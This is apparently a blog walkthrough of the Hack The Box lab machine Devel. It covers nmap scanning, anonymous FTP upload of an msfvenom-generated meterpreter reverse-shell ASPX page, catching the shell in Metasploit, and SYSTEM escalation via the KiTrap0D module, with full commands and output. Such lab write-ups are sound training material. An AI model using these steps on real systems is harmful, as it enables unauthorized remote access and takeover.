5/02/2022

HTB: Devel

 ___  ___  _________  ________                           
|\  \|\  \|\___   ___\\   __  \  ___                     
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                    
 \ \   __  \   \ \  \ \ \   __  \|__|                    
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                  
   \ \__\ \__\   \ \__\ \ \_______\|\__\                 
    \|__|\|__|    \|__|  \|_______|\|__|                 
 ________  _______   ___      ___ _______   ___          
|\   ___ \|\  ___ \ |\  \    /  /|\  ___ \ |\  \         
\ \  \_|\ \ \   __/|\ \  \  /  / | \   __/|\ \  \        
 \ \  \ \\ \ \  \_|/_\ \  \/  / / \ \  \_|/_\ \  \       
  \ \  \_\\ \ \  \_|\ \ \    / /   \ \  \_|\ \ \  \____  
   \ \_______\ \_______\ \__/ /     \ \_______\ \_______\
    \|_______|\|_______|\|__|/       \|_______|\|_______|

Hack The Box's Devel is an Easy machine that is a great introduction to using msfvenom to generate a payload and privilege escalation using Metasploit. Devel is an excellent machine for those looking to move ahead from the extremely easy machines like Blue, Lame, or Legacy.

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.129.232.194

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to start enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -A switch to enable an aggressive scan that will give us the results of OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute). You should receive the following output in your terminal:

nmap -A 10.129.232.194
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-01 18:49 BST
Nmap scan report for 10.129.232.194
Host is up (0.014s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.53 seconds

On port 21 we can see that a FTP server is running and open. We can also see that anonymous FTP login is allowed! Anonymous FTP login can be performed by connecting to the FTP server and using "anonymous" for the Name credential and leaving the Password field blank by hitting Enter.

Let's attempt to log into the FTP server using anonymous credentials by typing "ftp" followed by the IP address and hitting Enter.

ftp 10.129.232.194
Connected to 10.129.232.194.
220 Microsoft FTP Service
Name (10.129.232.194:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> 

We're in! Next, we will need to use this FTP connection as an attack vector by creating and uploading a payload using msfvenom and the "put" command. 

We will generate a aspx reverse shell payload to upload to the target computer by typing the following in a new terminal:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.75 LPORT=1234 -f aspx > devel.aspx

Please note, that the LHOST may be different and should match your machines IP. The LPORT can be any port number not in use and "devel.aspx" can have any file name you choose. 

Hit Enter to generate the payload file in your present working directory.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.75 LPORT=1234 -f aspx > devel.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2861 bytes

Once msfvenom generates the payload, we will need to upload the file to the FTP server using "put". In the terminal connected to the FTP server, type "put" followed by the payload file name. Note, if you were in a different directory connecting to the FTP server than the directory containing the payload on your machine, you will need to disconnect from the FTP server, change the present working directory, then reconnect.

ftp> put devel.aspx
local: devel.aspx remote: devel.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2897 bytes sent in 0.00 secs (65.7808 MB/s)
ftp> 

Our payload is now uploaded to the FTP server! In another terminal window or tab, let's boot up Metasploit by typing "msfconsole".

msfconsole
                                                  
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the resource command to run 
commands from a file

msf6 > 

Once Metasploit is running type "use multi/handler" and hit Enter. Next, type "set payload windows/meterpreter/reverse_tcp" and hit Enter to set the payload. Once this is done, let's use "show options" to display the options needed to run the exploit.

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thr
                                        ead, process, none)
   LHOST                      yes       The listen address (an interface may b
                                        e specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > 

As you can see, we will need to set the LHOST and LPORT. The LHOST will be your machines IP and LPORT will be the port set when we created the payload using msfvenom. Remember, your LPORT may need to be set to tun0 if using HTB PWNBOX.

Set these options by using the "set" command followed by the option name and its setting.

msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.75
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > 

Type "run" and hit Enter. Then, open your web browser and navigate to our aspx file on the server by typing the ip address of the target machine followed by "/" then the aspx file name. For example, "10.129.232.194/devel.aspx". Once the page loads, a meterpreter session will populate in your Metasploit terminal. You are now connected.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.75:1234 
[*] Sending stage (175174 bytes) to 10.129.247.224
[*] Meterpreter session 1 opened (10.10.14.75:1234 -> 10.129.247.224:49159) at 2022-05-01 20:10:00 +0100

meterpreter > 

From here, we will need to do some basic privilege escalation using Metasploit. Let's background this session by using the "background" command and then using the "search" command, search for kitra. ms10_015_kitrap0d is a privilege escalation exploit that will work with this machine.

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search kitra

Matching Modules
================

   #  Name                                     Disclosure Date  Rank   Check  Description
   -  ----                                     ---------------  ----   -----  -----------
   0  exploit/windows/local/ms10_015_kitrap0d  2010-01-19       great  Yes    Windows SYSTEM Escalation via KiTrap0D


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms10_015_kitrap0d

msf6 exploit(multi/handler) > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > 

If you ever need suggestions for which exploit to run for a meterpreter session, you can use Metasploits suggester. To use the suggester, type "search suggester" and use the Multi Recon Local Exploit Suggester. Once the module is loaded, set the SESSION option to the desired meterpreter session you have in the background, type "run" and hit Enter. This will give you suggested exploits for that meterpreter session.

Let's now view the exploit options using the "show options" command and setting the options accordingly. Your SESSION option should be set to whatever session number is assigned to the meterpreter session you put in the background. To view your background meterpreter sessions, you can use the "sessions" command. It should be 1 if you had no other sessions running in Metasploit. Remember to set your LHOST accordingly.

msf6 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh
                                        , thread, process, none)
   LHOST     159.203.63.76    yes       The listen address (an interface
                                        may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/local/ms10_015_kitrap0d) > 

Now we can run the exploit using the "run" command to get a new meterpreter session.

msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 10.10.14.75:4444 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 3124 launched.
[*] Reflectively injecting the DLL into 3124...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.129.247.224
[*] Meterpreter session 2 opened (10.10.14.75:4444 -> 10.129.247.224:49162) at 2022-05-01 20:47:04 +0100

meterpreter > 

Success! We can now type "shell" and hit Enter to get a shell on the target system!

meterpreter > shell
Process 3824 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>

Congrats! After successfully completing privilege escalation on the target system, you can now obtain the root and user .txt flags which are located within the user and administrator's Desktop folders.

No comments:

Post a Comment